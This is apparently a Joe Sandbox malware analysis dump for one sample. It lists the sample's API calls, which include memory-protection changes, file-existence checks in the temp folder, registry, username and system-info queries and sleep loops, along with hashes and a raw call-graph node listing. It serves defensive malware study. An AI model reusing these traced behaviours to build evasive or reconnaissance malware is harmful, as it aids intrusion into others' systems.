                                                  • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0076B9CA
                                                  • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 0076B9FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                  • String ID:
                                                  • API String ID: 2510009449-0
                                                  • Opcode ID: a34dc732b08cc3d88189158a146e47a5d440644af94d703805d599eb5e94a7b0
                                                  • Instruction ID: 1390fb41c03288269f79ebeca1f2e3dcfd69ea98affb922a24234655a971e3ab
                                                  • Opcode Fuzzy Hash: a34dc732b08cc3d88189158a146e47a5d440644af94d703805d599eb5e94a7b0
                                                  • Instruction Fuzzy Hash: 5892A7B5E00218EFCB14DBD8C995EEEB7B9AF88300F248199E509A7345D735AE45CF60

                                                  Control-flow Graph

                                                  control_flow_graph: function 76a5a5 (basic blocks 76a5a5-76a61c; rendered graph not reproduced; calls CreateFileW and WriteFile)
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0076A5C7
                                                  • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 0076A5F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: File$CreateWrite
                                                  • String ID:
                                                  • API String ID: 2263783195-0
                                                  • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                  • Instruction ID: 1ca0c7f09ee4729d53c931552d44522365a14222fd2322c1cdfde1269869f7e3
                                                  • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                  • Instruction Fuzzy Hash: 7F014075600208FBCB10DE98DD81F9AB7B9AF88314F20C155FE19AB281D631EE02DB90

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0076A675: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                  • LoadLibraryW.KERNELBASE(?), ref: 00769C16
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobalLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3361179946-0
                                                  • Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                  • Instruction ID: bf4d5def8b573a14da58c9e652b364f583385d3795b4c2aedc88d58b4cce9210
                                                  • Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                  • Instruction Fuzzy Hash: EBE0ED75E00208FFCB00EFE8DD8699D7BB8AF49211F108194FD0DA7340E635EA118B91

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                  • Instruction ID: f947e5f87ca58770a6f060f9439c93901d89ebc754ae8788d8df1d648750fec9
                                                  • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                  • Instruction Fuzzy Hash: EF91DB75D04109EFCB08CF98D890AEEBBB5BF49300F148159E916AB351D734AA85CFA0

                                                  Control-flow Graph

                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 0076A6A5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                  • Instruction ID: 276477d01cf5a05c104782cbd17e8212534ada490f883687118c060f804ad53e
                                                  • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                  • Instruction Fuzzy Hash: F9F02278614209EFCB44DF58D580959B7A5EB48360F20C299AC599B341D631EE81DB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1447219199.0000000000769000.00000020.00000001.01000000.00000003.sdmp, Offset: 00769000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_769000_pTvHtQDXio.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                  • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

                                                  Execution Graph

                                                  Execution Coverage:4.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:31.7%
                                                  Total number of Nodes:1479
                                                  Total number of Limit Nodes:11
3225220 27 API calls 3 library calls 33825->33878 33828->33825 33876 32303c0 40 API calls __Getctype 33828->33876 33877 3225220 27 API calls 3 library calls 33828->33877 33833 3224294 33830->33833 33835 322426e _Yarn 33830->33835 33831 322437e 33881 32026a0 27 API calls 33831->33881 33833->33831 33836 32242e8 33833->33836 33837 322430d 33833->33837 33834 3224383 33882 32025c0 27 API calls 2 library calls 33834->33882 33835->33663 33836->33834 33879 32025c0 27 API calls 3 library calls 33836->33879 33842 32242f9 _Yarn 33837->33842 33880 32025c0 27 API calls 3 library calls 33837->33880 33839 3224388 _AnonymousOriginator 33839->33663 33843 3224360 _AnonymousOriginator 33842->33843 33844 322f02c 25 API calls 33842->33844 33843->33663 33844->33831 33846 3231bb2 33845->33846 33883 32312c1 33846->33883 33849->33713 33851 3225783 33850->33851 33852 3225910 33851->33852 33853 3225850 33851->33853 33857 3225788 _Yarn 33851->33857 33918 32026a0 27 API calls 33852->33918 33858 3225885 33853->33858 33859 32258ab 33853->33859 33855 3225915 33919 32025c0 27 API calls 2 library calls 33855->33919 33857->33752 33858->33855 33861 3225890 33858->33861 33866 322589d _Yarn 33859->33866 33917 32025c0 27 API calls 3 library calls 33859->33917 33860 3225896 33863 322f02c 25 API calls 33860->33863 33860->33866 33916 32025c0 27 API calls 3 library calls 33861->33916 33865 322591f 33863->33865 33866->33752 33867->33798 33868->33804 33870->33733 33871->33755 33872->33777 33873->33817 33874->33822 33875->33822 33876->33828 33877->33828 33878->33825 33879->33842 33880->33842 33882->33839 33901 3230147 33883->33901 33885 323130c 33886 322e1f7 __cftoe 37 API calls 33885->33886 33893 3231318 33886->33893 33887 32312d3 33887->33885 33888 32312e8 33887->33888 33900 320661c RegOpenKeyExA 33887->33900 33908 3231262 14 API calls __dosmaperr 33888->33908 33890 32312ed 33909 322f01c 25 API calls __wsopen_s 33890->33909 33894 3231347 33893->33894 33910 3231b43 40 API calls 2 library calls 33893->33910 
33897 32313b1 33894->33897 33911 3231aec 25 API calls 2 library calls 33894->33911 33912 3231aec 25 API calls 2 library calls 33897->33912 33898 3231477 33898->33900 33913 3231262 14 API calls __dosmaperr 33898->33913 33900->33679 33900->33680 33902 323015f 33901->33902 33903 323014c 33901->33903 33902->33887 33914 3231262 14 API calls __dosmaperr 33903->33914 33905 3230151 33915 322f01c 25 API calls __wsopen_s 33905->33915 33907 323015c 33907->33887 33908->33890 33909->33900 33910->33893 33911->33897 33912->33898 33913->33900 33914->33905 33915->33907 33916->33860 33917->33866 33919->33860 33920->33407 33922 32232b1 _AnonymousOriginator 33921->33922 33923 322328e 33921->33923 33922->33421 33923->33922 33924 322f02c 25 API calls 33923->33924 33925 32232fc 33924->33925 33926->33432 33927->33438 33928->33442 33929->33449 33930->33453 33931->33445 33932->33450 33934->33414 33935->33416 33936->33425 33937->33428 33939 3207c4a 33938->33939 33953 320795f _AnonymousOriginator 33938->33953 33940 3207d12 33939->33940 33941 3207c73 33939->33941 34253 3224760 27 API calls 33940->34253 33942 3224250 27 API calls 33941->33942 33948 3207c92 _AnonymousOriginator 33942->33948 33944 3207d17 33945 322f02c 25 API calls 33944->33945 33947 3207d1c 33945->33947 33946 3207ce8 _AnonymousOriginator 33949 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33946->33949 33948->33944 33948->33946 33950 3207d0b 33949->33950 33950->33459 33951 3224250 27 API calls 33951->33953 33953->33939 33953->33940 33953->33944 33953->33951 34252 3225aa0 27 API calls _Yarn 33953->34252 34254 322b650 33954->34254 33957 3209458 33958 3223340 70 API calls 33957->33958 33961 3209467 33958->33961 33959 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33960 3209a0d 33959->33960 33960->33464 33962 32061f0 114 API calls 33961->33962 33963 
3209472 33962->33963 33964 3223340 70 API calls 33963->33964 33965 3209494 33964->33965 33966 32061f0 114 API calls 33965->33966 33967 320949f GetModuleHandleA GetProcAddress 33966->33967 33969 32094c5 _AnonymousOriginator 33967->33969 33970 3209546 _AnonymousOriginator 33969->33970 33971 3209a14 33969->33971 33972 3209573 GetNativeSystemInfo 33970->33972 33973 3209577 GetSystemInfo 33970->33973 33974 3209a19 33971->33974 33975 322f02c 25 API calls 33971->33975 33977 320957d 33972->33977 33973->33977 33976 322f02c 25 API calls 33974->33976 33975->33974 33978 3209a1e __fread_nolock 33976->33978 33979 32096b9 33977->33979 33980 32095df 33977->33980 34017 3209588 _AnonymousOriginator 33977->34017 33981 3209a85 GetVersionExW 33978->33981 33984 3223340 70 API calls 33979->33984 33982 3223340 70 API calls 33980->33982 33983 3209aad 33981->33983 34025 3209aa3 33981->34025 33986 3209600 33982->33986 33985 3223340 70 API calls 33983->33985 33987 32096e5 33984->33987 33988 3209abc 33985->33988 33989 32061f0 114 API calls 33986->33989 33991 32061f0 114 API calls 33987->33991 33993 32061f0 114 API calls 33988->33993 33994 3209607 33989->33994 33990 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 33995 3209c05 33990->33995 33992 32096ec 33991->33992 33996 3223340 70 API calls 33992->33996 33997 3209ac7 33993->33997 33998 3223340 70 API calls 33994->33998 33995->33464 33999 3209704 33996->33999 34002 3223340 70 API calls 33997->34002 34000 320961f 33998->34000 34001 32061f0 114 API calls 33999->34001 34003 32061f0 114 API calls 34000->34003 34004 320970b 34001->34004 34005 3209ae9 34002->34005 34008 3209626 34003->34008 34009 3223340 70 API calls 34004->34009 34006 32061f0 114 API calls 34005->34006 34007 3209af4 GetModuleHandleA GetProcAddress 34006->34007 34016 3209b1a _AnonymousOriginator 34007->34016 34256 3231e8f 40 API calls 34008->34256 34012 320973c 34009->34012 34015 32061f0 114 
API calls 34012->34015 34013 3209b97 _AnonymousOriginator 34018 3209bc8 GetSystemInfo 34013->34018 34013->34025 34014 3209651 34014->33974 34014->34017 34019 3209743 34015->34019 34016->34013 34020 3209c0c 34016->34020 34017->33959 34018->34025 34257 32091b0 123 API calls 3 library calls 34019->34257 34021 322f02c 25 API calls 34020->34021 34023 3209c11 34021->34023 34024 3209752 34026 3223340 70 API calls 34024->34026 34025->33990 34027 320978d 34026->34027 34028 32061f0 114 API calls 34027->34028 34029 3209794 34028->34029 34030 3223340 70 API calls 34029->34030 34031 32097ac 34030->34031 34032 32061f0 114 API calls 34031->34032 34033 32097b3 34032->34033 34034 3223340 70 API calls 34033->34034 34035 32097e4 34034->34035 34036 32061f0 114 API calls 34035->34036 34037 32097eb 34036->34037 34258 32091b0 123 API calls 3 library calls 34037->34258 34039 32097fa 34040 3223340 70 API calls 34039->34040 34041 3209835 34040->34041 34042 32061f0 114 API calls 34041->34042 34043 320983c 34042->34043 34044 3223340 70 API calls 34043->34044 34045 3209854 34044->34045 34046 32061f0 114 API calls 34045->34046 34047 320985b 34046->34047 34048 3223340 70 API calls 34047->34048 34049 320988c 34048->34049 34050 32061f0 114 API calls 34049->34050 34051 3209893 34050->34051 34259 32091b0 123 API calls 3 library calls 34051->34259 34053 32098a2 34054 3223340 70 API calls 34053->34054 34055 32098dd 34054->34055 34056 32061f0 114 API calls 34055->34056 34057 32098e4 34056->34057 34058 3223340 70 API calls 34057->34058 34059 32098fc 34058->34059 34060 32061f0 114 API calls 34059->34060 34061 3209903 34060->34061 34062 3223340 70 API calls 34061->34062 34063 3209934 34062->34063 34064 32061f0 114 API calls 34063->34064 34065 320993b 34064->34065 34260 32091b0 123 API calls 3 library calls 34065->34260 34067 320994a 34067->34017 34069 3204404 34068->34069 34069->34069 34070 320447d 34069->34070 34071 3224250 27 API calls 34069->34071 34072 32299c0 
__ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34070->34072 34071->34070 34073 320448c 34072->34073 34074 3209a20 34073->34074 34075 322b650 __fread_nolock 34074->34075 34076 3209a85 GetVersionExW 34075->34076 34077 3209aa3 34076->34077 34078 3209aad 34076->34078 34081 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34077->34081 34079 3223340 70 API calls 34078->34079 34080 3209abc 34079->34080 34082 32061f0 114 API calls 34080->34082 34083 3209c05 34081->34083 34084 3209ac7 34082->34084 34083->33471 34085 3223340 70 API calls 34084->34085 34086 3209ae9 34085->34086 34087 32061f0 114 API calls 34086->34087 34088 3209af4 34087->34088 34089 3209afd 34088->34089 34090 3209aff GetModuleHandleA GetProcAddress 34088->34090 34089->34090 34091 3209b1a _AnonymousOriginator 34090->34091 34093 3209c0c 34091->34093 34094 3209b97 _AnonymousOriginator 34091->34094 34092 3209bc8 GetSystemInfo 34096 3209bc4 34092->34096 34095 322f02c 25 API calls 34093->34095 34094->34092 34094->34096 34097 3209c11 34095->34097 34096->34077 34099 320b2e0 34098->34099 34099->34099 34100 320b331 34099->34100 34101 320b4ab 34099->34101 34107 320b2f4 _Yarn 34099->34107 34275 32256e0 27 API calls std::_Facet_Register 34100->34275 34276 32026a0 27 API calls 34101->34276 34103 320b4b0 34106 322f02c 25 API calls 34103->34106 34108 320b4b5 34106->34108 34261 3223010 34107->34261 34109 320b3e7 34109->34103 34111 320b483 _AnonymousOriginator 34109->34111 34110 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34112 320b4a7 34110->34112 34111->34110 34113 320b700 34112->34113 34114 3223340 70 API calls 34113->34114 34115 320b742 34114->34115 34116 32061f0 114 API calls 34115->34116 34117 320b74a 34116->34117 34281 320a270 GetTempPathA 34117->34281 
34120 3225740 27 API calls 34121 320b76f GetFileAttributesA 34120->34121 34122 320b788 _AnonymousOriginator 34121->34122 34123 320b853 _AnonymousOriginator 34122->34123 34124 320c689 34122->34124 34127 3223340 70 API calls 34123->34127 34237 320b861 34123->34237 34125 322f02c 25 API calls 34124->34125 34126 320c6c5 34125->34126 34129 320b87c 34127->34129 34128 3224250 27 API calls 34131 320c675 GetModuleFileNameA 34128->34131 34130 32061f0 114 API calls 34129->34130 34132 320b884 34130->34132 34131->33491 34133 320a270 115 API calls 34132->34133 34134 320b898 34133->34134 34135 3225740 27 API calls 34134->34135 34136 320b8a9 GetFileAttributesA 34135->34136 34137 320b8c2 _AnonymousOriginator 34136->34137 34138 3223340 70 API calls 34137->34138 34137->34237 34139 320b9b6 34138->34139 34140 32061f0 114 API calls 34139->34140 34141 320b9be 34140->34141 34142 320a270 115 API calls 34141->34142 34143 320b9d2 34142->34143 34144 3225740 27 API calls 34143->34144 34145 320b9e3 GetFileAttributesA 34144->34145 34146 320b9fc _AnonymousOriginator 34145->34146 34147 3223340 70 API calls 34146->34147 34146->34237 34148 320baf0 34147->34148 34149 32061f0 114 API calls 34148->34149 34150 320baf8 34149->34150 34151 320a270 115 API calls 34150->34151 34152 320bb0c 34151->34152 34153 3225740 27 API calls 34152->34153 34154 320bb1d GetFileAttributesA 34153->34154 34155 320bb36 _AnonymousOriginator 34154->34155 34156 3223340 70 API calls 34155->34156 34155->34237 34157 320bc2a 34156->34157 34158 32061f0 114 API calls 34157->34158 34159 320bc32 34158->34159 34160 320a270 115 API calls 34159->34160 34161 320bc46 34160->34161 34162 3225740 27 API calls 34161->34162 34163 320bc57 GetFileAttributesA 34162->34163 34164 320bc70 _AnonymousOriginator 34163->34164 34165 3223340 70 API calls 34164->34165 34164->34237 34166 320bd64 34165->34166 34167 32061f0 114 API calls 34166->34167 34168 320bd6c 34167->34168 34169 320a270 115 API calls 34168->34169 34170 320bd80 34169->34170 34171 3225740 27 API 
calls 34170->34171 34172 320bd91 GetFileAttributesA 34171->34172 34173 320bdaa _AnonymousOriginator 34172->34173 34174 3223340 70 API calls 34173->34174 34173->34237 34175 320be9e 34174->34175 34176 32061f0 114 API calls 34175->34176 34177 320bea6 34176->34177 34178 320a270 115 API calls 34177->34178 34179 320beba 34178->34179 34180 3225740 27 API calls 34179->34180 34181 320becb GetFileAttributesA 34180->34181 34182 320bee4 _AnonymousOriginator 34181->34182 34183 3223340 70 API calls 34182->34183 34182->34237 34184 320bfd8 34183->34184 34185 32061f0 114 API calls 34184->34185 34186 320bfe0 34185->34186 34187 320a270 115 API calls 34186->34187 34188 320bff4 34187->34188 34189 3225740 27 API calls 34188->34189 34190 320c005 GetFileAttributesA 34189->34190 34191 320c01e _AnonymousOriginator 34190->34191 34192 3223340 70 API calls 34191->34192 34191->34237 34193 320c112 34192->34193 34194 32061f0 114 API calls 34193->34194 34195 320c11a 34194->34195 34196 320a270 115 API calls 34195->34196 34197 320c12e 34196->34197 34198 3225740 27 API calls 34197->34198 34199 320c13f GetFileAttributesA 34198->34199 34200 320c158 _AnonymousOriginator 34199->34200 34201 3223340 70 API calls 34200->34201 34200->34237 34202 320c24c 34201->34202 34203 32061f0 114 API calls 34202->34203 34204 320c254 34203->34204 34205 320a270 115 API calls 34204->34205 34206 320c268 34205->34206 34207 3225740 27 API calls 34206->34207 34208 320c279 GetFileAttributesA 34207->34208 34209 320c292 _AnonymousOriginator 34208->34209 34210 3223340 70 API calls 34209->34210 34209->34237 34211 320c386 34210->34211 34212 32061f0 114 API calls 34211->34212 34213 320c38e 34212->34213 34214 320a270 115 API calls 34213->34214 34215 320c3a2 34214->34215 34216 3225740 27 API calls 34215->34216 34217 320c3b3 GetFileAttributesA 34216->34217 34219 320c3cc _AnonymousOriginator 34217->34219 34218 3223340 70 API calls 34220 320c4c0 34218->34220 34219->34218 34219->34237 34221 32061f0 114 API calls 34220->34221 34222 320c4cb 
34221->34222 34223 320a270 115 API calls 34222->34223 34224 320c4e2 34223->34224 34225 3225740 27 API calls 34224->34225 34226 320c4f3 GetFileAttributesA 34225->34226 34228 320c50c _AnonymousOriginator 34226->34228 34227 32093d0 132 API calls 34229 320c61a 34227->34229 34228->34227 34228->34237 34230 32093d0 132 API calls 34229->34230 34229->34237 34231 320c624 34230->34231 34232 32093d0 132 API calls 34231->34232 34231->34237 34233 320c62e 34232->34233 34234 32093d0 132 API calls 34233->34234 34233->34237 34235 320c638 34234->34235 34236 32093d0 132 API calls 34235->34236 34235->34237 34236->34237 34237->34128 34239 3209e46 34238->34239 34240 3209e78 _AnonymousOriginator 34239->34240 34242 3209e93 34239->34242 34241 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34240->34241 34243 3209e8f 34241->34243 34244 322f02c 25 API calls 34242->34244 34243->33496 34245 3209e98 34244->34245 34247 3224909 34246->34247 34248 322491d _Yarn 34247->34248 34298 32254c0 27 API calls 3 library calls 34247->34298 34248->33553 34250->33611 34251->33614 34252->33953 34255 3209436 GetVersionExW 34254->34255 34255->33957 34255->34017 34256->34014 34257->34024 34258->34039 34259->34053 34260->34067 34263 322302b 34261->34263 34274 3223114 _Yarn _AnonymousOriginator 34261->34274 34262 32231a1 34279 32026a0 27 API calls 34262->34279 34263->34262 34267 32230c1 34263->34267 34268 322309a 34263->34268 34273 32230ab _Yarn 34263->34273 34263->34274 34265 32231a6 34280 32025c0 27 API calls 2 library calls 34265->34280 34267->34273 34278 32025c0 27 API calls 3 library calls 34267->34278 34268->34265 34277 32025c0 27 API calls 3 library calls 34268->34277 34269 32231ab 34272 322f02c 25 API calls 34272->34262 34273->34272 34273->34274 34274->34109 34275->34107 34277->34273 34278->34273 34280->34269 34282 3223340 70 API calls 34281->34282 34283 320a2cc 34282->34283 34284 32061f0 114 API calls 34283->34284 
34285 320a2d7 34284->34285 34286 3224250 27 API calls 34285->34286 34287 320a32d 34286->34287 34288 3224250 27 API calls 34287->34288 34289 320a389 34288->34289 34290 3225740 27 API calls 34289->34290 34295 320a3a2 _AnonymousOriginator 34290->34295 34291 320a465 34294 322f02c 25 API calls 34291->34294 34292 320a43e _AnonymousOriginator 34293 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34292->34293 34296 320a461 34293->34296 34297 320a46a 34294->34297 34295->34291 34295->34292 34296->34120 34298->34248 34302 3220d20 34299->34302 34300 3223340 70 API calls 34300->34302 34301 32061f0 114 API calls 34301->34302 34302->34300 34302->34301 34305 321eca0 34302->34305 34304 3220d6c Sleep 34304->34302 34306 321ecdc 34305->34306 34310 321f3ce _AnonymousOriginator 34305->34310 34307 3223340 70 API calls 34306->34307 34306->34310 34311 321ecfd 34307->34311 34308 321f444 _AnonymousOriginator 34312 32299c0 __ehhandler$?_RunAndWait@_TaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 34308->34312 34309 321f4a1 34314 322f02c 25 API calls 34309->34314 34310->34308 34310->34309 34315 32061f0 114 API calls 34311->34315 34313 321f466 34312->34313 34313->34304 34320 321f4a6 34314->34320 34316 321ed04 34315->34316 34317 3223340 70 API calls 34316->34317 34318 321ed16 34317->34318 34319 3223340 70 API calls 34318->34319 34321 321ed28 34319->34321 34322 32078e0 27 API calls 34320->34322 34609 32105b0 34321->34609 34324 321f4f8 34322->34324 34326 3223280 25 API calls 34324->34326 34327 321f506 34326->34327 34330 321f536 _AnonymousOriginator 34327->34330 34334 3220cca 34327->34334 34328 3223340 70 API calls 34329 321ed49 34328->34329 34331 3223340 70 API calls 34329->34331 34332 32093d0 132 API calls 34330->34332 34333 321ed61 34331->34333 34335 321f545 34332->34335 34336 32061f0 114 API calls 34333->34336 34338 322f02c 25 API calls 
34334->34338 34337 32043e0 27 API calls 34335->34337 34339 321ed68 34336->34339 34340 321f552 34337->34340 34341 3220ce3 34338->34341 34640 3209c20 34339->34640 34343 3209a20 118 API calls 34340->34343 34345 321f55e 34343->34345 34346 32043e0 27 API calls 34345->34346 34349 321f56b RegOpenKeyExA RegCloseKey 34346->34349 34347 3223340 70 API calls 34350 321ed90 34347->34350 34348 3223340 70 API calls 34351 321f01b 34348->34351 34352 32043e0 27 API calls 34349->34352 34354 3223340 70 API calls 34350->34354 34355 3223340 70 API calls 34351->34355 34353 321f5bb 34352->34353 34357 3223340 70 API calls 34353->34357 34358 321eda8 34354->34358 34356 321f030 34355->34356 34359 3223340 70 API calls 34356->34359 34360 321f5d9 34357->34360 34361 32061f0 114 API calls 34358->34361 34362 321f042 34359->34362 34363 32061f0 114 API calls 34360->34363 34364 321edaf 34361->34364 34365 32105b0 121 API calls 34362->34365 34366 321f5e0 34363->34366 34367 3209c20 27 API calls 34364->34367 34368 321f04e 34365->34368 34369 3223340 70 API calls 34366->34369 34370 321edbb 34367->34370 34371 3223340 70 API calls 34368->34371 34372 321f5f5 34369->34372 34373 3223340 70 API calls 34370->34373 34478 321eff5 34370->34478 34374 321f063 34371->34374 34375 32061f0 114 API calls 34372->34375 34376 321edd8 34373->34376 34377 3223340 70 API calls 34374->34377 34378 321f5fc 34375->34378 34379 32061f0 114 API calls 34376->34379 34380 321f07b 34377->34380 34382 321f613 GetUserNameA 34378->34382 34386 321ede0 34379->34386 34381 32061f0 114 API calls 34380->34381 34383 321f082 34381->34383 34384 321f666 34382->34384 34385 3209c20 27 API calls 34383->34385 34384->34384 34388 3224250 27 API calls 34384->34388 34387 321f08e 34385->34387 34389 321ee31 34386->34389 34390 321f46a 34386->34390 34394 3223340 70 API calls 34387->34394 34404 321f35e _AnonymousOriginator 34387->34404 34391 321f682 34388->34391 34393 3224250 27 API calls 34389->34393 34655 3224760 27 API calls 34390->34655 34395 320b250 28 API calls 
34391->34395 34398 321ee4e 34393->34398 34399 321f0aa 34394->34399 34396 321f691 34395->34396 34401 320b700 145 API calls 34396->34401 34397 321f46f 34402 322f02c 25 API calls 34397->34402 34405 3223280 25 API calls 34398->34405 34400 3223340 70 API calls 34399->34400 34406 321f0c2 34400->34406 34407 321f6a0 GetModuleFileNameA 34401->34407 34409 321f474 34402->34409 34403 321f49c 34408 322f02c 25 API calls 34403->34408 34404->34310 34404->34403 34416 321ee5a _AnonymousOriginator 34405->34416 34410 32061f0 114 API calls 34406->34410 34411 321f6e3 34407->34411 34408->34309 34412 322f02c 25 API calls 34409->34412 34413 321f0c9 34410->34413 34411->34411 34418 3224250 27 API calls 34411->34418 34415 321f479 34412->34415 34417 3209c20 27 API calls 34413->34417 34414 321eebc _AnonymousOriginator 34420 3223340 70 API calls 34414->34420 34656 322865c 27 API calls 2 library calls 34415->34656 34416->34397 34416->34414 34421 321f0d5 34417->34421 34422 321f6fb 34418->34422 34424 321eed5 34420->34424 34421->34404 34428 3223340 70 API calls 34421->34428 34425 3209e20 25 API calls 34422->34425 34423 321f483 34657 3224760 27 API calls 34423->34657 34427 32061f0 114 API calls 34424->34427 34429 321f700 34425->34429 34437 321eedd 34427->34437 34431 321f0f2 34428->34431 34432 32043e0 27 API calls 34429->34432 34430 321f488 34658 322869c 27 API calls 2 library calls 34430->34658 34434 32061f0 114 API calls 34431->34434 34435 321f71d 34432->34435 34447 321f0fa 34434->34447 34438 3223340 70 API calls 34435->34438 34436 321f492 34439 322f02c 25 API calls 34436->34439 34440 3224250 27 API calls 34437->34440 34441 321f737 34438->34441 34442 321f497 34439->34442 34444 321ef3b 34440->34444 34445 32061f0 114 API calls 34441->34445 34443 322f02c 25 API calls 34442->34443 34443->34403 34446 3223280 25 API calls 34444->34446 34448 321f742 34445->34448 34458 321ef47 _AnonymousOriginator 34446->34458 34447->34423 34449 321f14b 34447->34449 34450 32043e0 27 API calls 34448->34450 34451 3224250 27 
API calls 34449->34451 34452 321f759 34450->34452 34453 321f168 34451->34453 34454 3223340 70 API calls 34452->34454 34456 3223280 25 API calls 34453->34456 34457 321f76f 34454->34457 34455 321efa9 _AnonymousOriginator 34455->34478 34652 320b5f0 114 API calls 3 library calls 34455->34652 34468 321f174 _AnonymousOriginator 34456->34468 34459 32061f0 114 API calls 34457->34459 34458->34409 34458->34455 34461 321f77a 34459->34461 34463 3223340 70 API calls 34461->34463 34462 321efc1 34462->34478 34653 3231262 14 API calls __dosmaperr 34462->34653 34466 321f79d 34463->34466 34464 321f1d6 _AnonymousOriginator 34465 3223340 70 API calls 34464->34465 34469 321f1ef 34465->34469 34470 32061f0 114 API calls 34466->34470 34468->34436 34468->34464 34472 32061f0 114 API calls 34469->34472 34473 321f7a8 34470->34473 34471 321efca 34474 3231b97 40 API calls 34471->34474 34480 321f1f7 34472->34480 34475 3223340 70 API calls 34473->34475 34476 321efe9 34474->34476 34477 321f7cb 34475->34477 34476->34415 34476->34478 34479 32061f0 114 API calls 34477->34479 34478->34348 34478->34430 34481 321f7d6 34479->34481 34482 3224250 27 API calls 34480->34482 34483 3223340 70 API calls 34481->34483 34484 321f255 34482->34484 34485 321f7f9 34483->34485 34486 3223280 25 API calls 34484->34486 34487 32061f0 114 API calls 34485->34487 34493 321f261 _AnonymousOriginator 34486->34493 34488 321f804 34487->34488 34489 3223340 70 API calls 34488->34489 34490 321f827 34489->34490 34492 32061f0 114 API calls 34490->34492 34491 321f2c3 _AnonymousOriginator 34494 3223340 70 API calls 34491->34494 34495 321f832 34492->34495 34493->34442 